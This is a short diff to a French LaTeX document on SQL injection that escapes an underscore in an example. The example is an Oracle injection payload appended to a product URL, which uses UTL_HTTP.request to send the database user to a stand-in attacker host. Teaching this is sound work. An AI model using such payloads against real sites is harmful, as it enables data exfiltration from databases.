--- a/latex/Web/sqli.tex
+++ b/latex/Web/sqli.tex
@@ -58,7 +58,7 @@ Par exemple, la requête (Oracle) suivante va envoyer des information vers la ma
 \begin{center}
 http://www.monsite.tld/product.php?id=10
 
-||UTL_HTTP.request(‘attaquant.tld:80’
+||UTL\_HTTP.request(‘attaquant.tld:80’
 
 ||(SELECT user FROM DUAL)--
 \end{center}
